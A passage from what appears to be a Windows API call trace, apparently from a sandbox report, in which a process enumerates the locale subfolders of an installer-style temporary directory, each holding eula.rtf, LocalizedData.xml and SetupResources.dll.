ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x109e, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0196.025] FindNextFileW (in: hFindFile=0x604638, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x151aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0196.025] FindNextFileW (in: hFindFile=0x604638, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0196.025] FindNextFileW (in: hFindFile=0x604638, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0196.025] FindClose (in: hFindFile=0x604638 | out: hFindFile=0x604638) returned 1 [0196.025] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0196.025] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1040", cAlternateFileName="")) returned 1 [0196.025] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1040\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604538 [0196.026] FindNextFileW (in: hFindFile=0x604538, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0196.026] FindNextFileW (in: hFindFile=0x604538, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe3b, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0196.026] FindNextFileW (in: hFindFile=0x604538, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x138bc, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0196.026] FindNextFileW (in: hFindFile=0x604538, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0196.026] FindNextFileW (in: hFindFile=0x604538, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0196.026] FindClose (in: hFindFile=0x604538 | out: hFindFile=0x604538) returned 1 [0196.026] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0196.026] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1041", cAlternateFileName="")) returned 1 [0196.026] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1041\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604678 [0196.027] FindNextFileW (in: hFindFile=0x604678, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0196.027] FindNextFileW (in: hFindFile=0x604678, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x278d, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0196.027] FindNextFileW (in: hFindFile=0x604678, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x10a82, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0196.027] FindNextFileW (in: hFindFile=0x604678, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3d58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0196.027] FindNextFileW (in: hFindFile=0x604678, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3d58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0196.027] FindClose (in: hFindFile=0x604678 | out: hFindFile=0x604678) returned 1 [0196.027] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0196.027] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1042", cAlternateFileName="")) returned 1 [0196.027] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1042\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604578 [0196.028] FindNextFileW (in: hFindFile=0x604578, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0196.028] FindNextFileW (in: hFindFile=0x604578, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x318f, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0196.028] FindNextFileW (in: hFindFile=0x604578, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xfed6, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0196.028] FindNextFileW (in: hFindFile=0x604578, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0196.028] FindNextFileW (in: hFindFile=0x604578, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0196.028] FindClose (in: hFindFile=0x604578 | out: hFindFile=0x604578) returned 1 [0196.028] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0196.028] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1043", cAlternateFileName="")) returned 1 [0196.028] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1043\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6049b8 [0196.029] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0196.029] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xdda, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0196.029] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13712, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0196.029] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0196.029] FindNextFileW (in: hFindFile=0x6049b8, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0196.029] FindClose (in: hFindFile=0x6049b8 | out: hFindFile=0x6049b8) returned 1 [0196.029] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0196.029] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1044", cAlternateFileName="")) returned 1 [0196.029] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1044\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604278 [0196.031] FindNextFileW (in: hFindFile=0x604278, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0196.031] FindNextFileW (in: hFindFile=0x604278, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xbe6, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0196.031] FindNextFileW (in: hFindFile=0x604278, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x135c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0196.031] FindNextFileW (in: hFindFile=0x604278, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0196.031] FindNextFileW (in: hFindFile=0x604278, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0196.033] FindClose (in: hFindFile=0x604278 | out: hFindFile=0x604278) returned 1 [0196.033] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x3f91248 | out: hHeap=0x5e0000) returned 1 [0196.033] FindNextFileW (in: hFindFile=0x6047f8, lpFindFileData=0x3cdfa7c | out: lpFindFileData=0x3cdfa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1045", cAlternateFileName="")) returned 1 [0196.033] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1045\\*", lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x604978 [0196.034] FindNextFileW (in: hFindFile=0x604978, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0196.034] FindNextFileW (in: hFindFile=0x604978, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xfc8, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0196.035] FindNextFileW (in: hFindFile=0x604978, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x141c6, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0196.035] FindNextFileW (in: hFindFile=0x604978, lpFindFileData=0x3cdf800 | out: lpFindFileData=0x3cdf800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0196.035] 